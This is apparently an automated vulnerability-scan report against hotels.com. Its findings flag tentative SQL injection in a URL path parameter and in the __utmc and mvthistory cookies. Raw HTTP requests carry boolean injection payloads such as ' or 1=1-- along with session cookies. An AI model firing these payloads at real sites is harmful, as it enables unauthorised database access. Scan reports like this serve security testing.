Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=5823045321059860'%20or%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:31:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:02 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:03 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h4>
<div class="property_details_reviews_trip_advisor">
<div class="overall_review clearfix">
<span class="overall">Overall rating:</span>
<span class="tripadvisor_owl_small"></span>
<span class="tripadvisor_rating tripadvisor_rating_40"><span class="bar"></span><span class="sprite"></span></span>
<span class="basedon">
Based on <em>1288</em> traveller reviews</span>
</div>
<h3>Most recent traveller reviews:</h3>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_30">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class="title">"Amazing location, great lobby, small rooms"</q>
<div class="review_data">
<abbr title="10/01/11" class="date">10/01/11</abbr>
<span class="author">gopher2003</span>
<span class="location">Denver</span>
</div>
<p>
"If you are looking to spend very little time in the room, or you are travling alone and don't mind tight quarters, but location is your priority- this is the place for you. Parker House is on the Freedom Trail, located next to everything h
...[SNIP]...

Request 2

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=5823045321059860'%20or%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:31:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:03 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h4>
<div class="property_details_reviews_trip_advisor">
<div class="overall_review clearfix">
<span class="overall">Overall rating:</span>
<span class="tripadvisor_owl_small"></span>
<span class="tripadvisor_rating tripadvisor_rating_40"><span class="bar"></span><span class="sprite"></span></span>
<span class="basedon">
Based on <em>1288</em> traveller reviews</span>
</div>
<h3>Most recent traveller reviews:</h3>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_30">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class="title">"Amazing location, great lobby, small rooms"</q>
<div class="review_data">
<abbr title="10/01/11" class="date">10/01/11</abbr>
<span class="author">gopher2003</span>
<span class="location">Denver</span>
</div>
<p>
"If you are looking to spend very little time in the room, or you are travling alone and don't mind tight quarters, but location is your priority- this is the place for you. Parker House is on the Freedom Trail, located next to everything historical and mere blocks from three different subway stops. You absolutly can't beat the location. That being said, the room is one of the smallest I've been in. It was clean, tighty and comfy if you don't need a lot of room. Also, its historical so translate that as thin walls."
</p>
</div>
<div class="clear-both"></div>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_40">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class
...[SNIP]...
1.21. http://www.hotels.com/hoteldetails/urgencypopup.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 16779709'%20or%201%3d1--%20 and 16779709'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hoteldetails/urgencypopup.html16779709'%20or%201%3d1--%20?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:26 GMT
Content-Length: 41824
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKYa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAIe7QjZSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKYa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAIe7QjZSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
</ul>
</div>
<div class="main_links" role="navigation">
<ul class="main_nav">
<li class="first">
<a class="clickreport " href="http://www.hotels.com/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdIdFQlySAI6pZ0OApYg33RWfGOdA61bA-wBSA2wmJ5tO7Mb2DK2cjNZRnUiQucEIQ..">Hotels</a>
</li>
<li class="deals">
<a class="clickreport " href="http://www.hotels.com/deals/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikfV8l41X81B1pOxSsGx7JlPHtt9ZLXVa91DJ8ST8H1Lxi84a8_hhwLk.">Hotel Deals</a>
</li>
<li class="">
<a class="clickreport " href="http://www.hotels.com/hotel/packages.html" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdgvi0gfNwOUFOmxtlW1DoVWfGOdA61bA-wBSA2wmJ5tvGPLPCtG0u5xQQ2OuQoko
...[SNIP]...

Request 2

GET /hoteldetails/urgencypopup.html16779709'%20or%201%3d2--%20?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Content-Length: 41968
Date: Mon, 03 Oct 2011 00:29:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKUa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAJ-e43JSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKUa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAJ-e43JSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
</ul>
</div>
<div class="main_links" role="navigation">
<ul class="main_nav">
<li class="first">
<a class="clickreport " href="http://www.hotels.com/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdIdFQlySAI6pZ0OApYg33RWfGOdA61bA-wBSA2wmJ5tO7Mb2DK2cjNZRnUiQucEIQ..">Hotels</a>
</li>
<li class="deals">
<a class="clickreport " href="http://www.hotels.com/deals/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikfV8l41X81B1pOxSsGx7JlPHtt9ZLXVa91DJ8ST8H1Lxi84a8_hhwLk.">Hotel Deals</a>
</li>
<li class="">
<a class="clickreport " href="http://www.hotels.com/hotel/packages.html" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdgvi0gfNwOUFOmxtlW1DoVWfGOdA61bA-wBSA2wmJ5tvGPLPCtG0u5xQQ2OuQoko
...[SNIP]...
1.22. http://www.hotels.com/hoteldetails/urgencypopup.html [mvthistory cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The mvthistory cookie appears to be vulnerable to SQL injection attacks. The payloads 12592570'%20or%201%3d1--%20 and 12592570'%20or%201%3d2--%20 were each submitted in the mvthistory cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US12592570'%20or%201%3d1--%20; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Cteonnt-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.0.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4xLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjAuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjAuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

Request 2

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
